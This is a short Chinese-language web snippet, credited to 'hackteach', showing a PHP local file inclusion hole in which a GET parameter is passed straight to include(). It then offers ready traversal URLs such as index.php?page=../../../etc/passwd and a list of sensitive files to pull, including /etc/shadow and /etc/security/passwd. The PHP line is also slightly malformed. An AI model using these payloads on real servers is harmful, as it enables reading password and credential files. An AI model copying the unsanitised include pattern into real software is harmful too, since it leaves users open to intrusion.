php 伪造本地文件包含漏洞的代码 |
|
本文标签:包含漏洞 代码: 复制代码 代码如下: <?php $page=$_GET[page]; include($page.php); ?> 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.php?page=../../../etc/passwd http://www.xxx.com/index.php?page=..../../etc/passwd 获取更多数据: etc/profile etc/services /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security/mkuser.default 来自hackteach |
